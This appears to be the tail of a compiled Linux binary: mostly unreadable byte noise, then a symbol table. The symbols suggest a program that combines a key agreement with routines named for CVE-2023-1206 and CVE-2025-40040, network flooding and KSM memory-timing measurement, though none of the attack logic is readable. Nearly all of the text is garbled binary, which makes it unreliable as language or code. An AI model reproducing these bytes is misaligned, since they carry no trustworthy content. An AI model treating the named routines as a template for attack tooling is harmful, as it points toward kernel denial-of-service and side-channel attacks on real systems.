P5��-�kH�-�{H`,U/S/Y�U�`,T(V(Y�T��,0� s�U� %�U s"��,
T9�d,
N9�+U�V���U���V���U�?+0P0�S��S�+P7V�+V�+
P2�,�I�)GUG�S���U��)T]Y]��T�*'P'ISbkPklSs�S?*
29�?*@�?*UV)U�V���U���V-)
P��P��S��P�)V�'+U+�V��U��V��U��V���U��'"T"2Q2�]���T��'Q�\��Q��\��Q��\���Q�Z(
0�
1S1Es�EJs�JhSh�s���s�m(PSUPm(s3&�Ps3&�7s3&�U�s3&�m(s7�Rs7�7s7�U�s7��(
D�OYD��("
2��'/
01�(�+I(�`I(��I/(��ID(
�1��$�U��S���U���S�$�T��V���T���V��T��V�$yQy�\���Q���\I&@P@�]��P��]��]�&AX��X�&"}x'�"%P%A}x'���}x'��&$By1$#���������}#���������x#���������+(#���������-��$`^`cP��^%�T%�u��%Cu�C�q�`�"%P�
t3$t"2$t"�"%,0��%;0��%;V�%;5��%:U0&
2�T&60�T&5P56]T&6VT&66�T&5U'40�'4]'4V'46�'3Ui'30�i'3Vi'35�i'2U�'
�0�#"U"�S���U���S#=T=�\���T���T��\#MQM�_���Q���Q��_2#n0�n�P��V��0���P��V2#�0���^��0���^�#Y;v~'���Y��v~'��#4]49P��];#60�;#6\;#63�;#5Uq#
5��#&0��#%P%&V�#&\�#&4��#%Us$%0�s$%Vs$%\s$%4�s$$U�$%
�0�p"*U*uSuw�U�w�Sp"
T
vVvw�T�w�Vp"6Q6��Q��"Q�Q��"1��"U�P��"0��"H��"V�"S�"	��P! U �V���U�T!0��ST!0�p!1
�p!]1}o�p!v%R�!
5��!
�8�� UT�U�� 
u
Py�`�� 
0�
PX� 
0�
7ty#� 9%�7Cty#�9%�!	q���� $u����!�	r���� $u����!�!q���� $p����!�!U!Q!P!Q� P )S;XPXmSstPtuS�
�8��PS�
�8��PS���I US�U�8S8=�U��"U"USUV�U�VnS�S��I0[U[���}0?T?��T��&0���_�&0��&0���^��S��S�Po�P�	QC@�C
�C��}�T��}�C��}C
��1����}�U��}��U��S���U���S�T��V���T�QQ�^��^T�V���T
� $ &~"���VT0��q�*
��*�~�.}ʚ;��~"�*
��*�~�.0��~ʚ;��~"�*
��*�~�37}ʚ;��~"�*
��*�~�q0��FUF�S���U���S�S�T�V���T���V�V&
�8�&@����&]��&J��NJ�4��0��U��pJ�U�U� SuS�q�`� P�
t3$t"2$t"� <0�"GUGn�U�""T"G�TGn�T�"+Q+G�UGn�Q�"2R2G�XGn�R�"GXGn�X�L����)00;�j��47A-�(F
#&)@EMnd"'/B���`)03�n���
� H!#/!	&)!T!k[!
!F�!x""*/�#;X$H�$!��%;'>Y'H�'"'*/h(7F��(
OY[);;�).38;CCMR�+
d,�,
�,	�,�-
<H�� �FM�!��(�(���	� �/�;`C�Q�_�j�l�0�H`��\�p��\_��A��\
 ;�^3N�)^o)����'.���R�  `��!�\)p"�4M``g =s��-�+B���0q��t�`, `? N`[k0z���� T��P`�&�P!���$�	 `(��-FWh|#����`,Y��`����n� 3`? �P"n[�,g ��"����@`�Scrt1.o__abi_taginterleaved_key_agreement.csig_handlerrunningnet_init.coldksm_init.coldcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___snprintf_chk@GLIBC_2.3.4connect_to_peerrecv@GLIBC_2.2.5setup_listen_socketputchar@GLIBC_2.2.5run_interleaved__libc_start_main@GLIBC_2.34net_init_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5in6addr_any@GLIBC_2.2.5setsockopt@GLIBC_2.2.5recv_protoclock_gettime@GLIBC_2.17getpid@GLIBC_2.2.5_edataksm_cleanupfclose@GLIBC_2.2.5_finiaccept_peer__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5net_measure_floodsend@GLIBC_2.2.5sendto@GLIBC_2.2.5srand@GLIBC_2.2.5__data_startsignal@GLIBC_2.2.5optarg@GLIBC_2.2.5__gmon_start____dso_handlenet_flood_burst_IO_stdin_usedinet_pton@GLIBC_2.2.5time@GLIBC_2.2.5__isoc23_strtol@GLIBC_2.38ksm_measure_writelisten@GLIBC_2.2.5_endksm_calibrateround_cve_2025_40040__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4poll@GLIBC_2.2.5bind@GLIBC_2.2.5madvise@GLIBC_2.2.5round_cve_2023_1206fopen@GLIBC_2.2.5perror@GLIBC_2.2.5print_keygetopt@GLIBC_2.2.5ksm_enable_systemaccept@GLIBC_2.2.5ksm_initnet_cleanupconnect@GLIBC_2.2.5fwrite@GLIBC_2.2.5__TMC_END__ksm_fill_patternsend_protoprint_usage_ITM_registerTMCloneTablegetaddrinfo@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5usleep@GLIBC_2.2.5freeaddrinfo@GLIBC_2.2.5stderr@GLIBC_2.2.5socket@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.data.rel.ro.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��4a��i���q���o�	
�	V~���o(
(
p��
�
�B��0��  0�PP�`` ���W��-�-
�00 � ; ;��<<���\�L��\�L��\�L 
�\�L���^�NP`P `P0 0P+'?PP6�P�JB5�RP���\0��g0��>w�����PP�	&	P�V��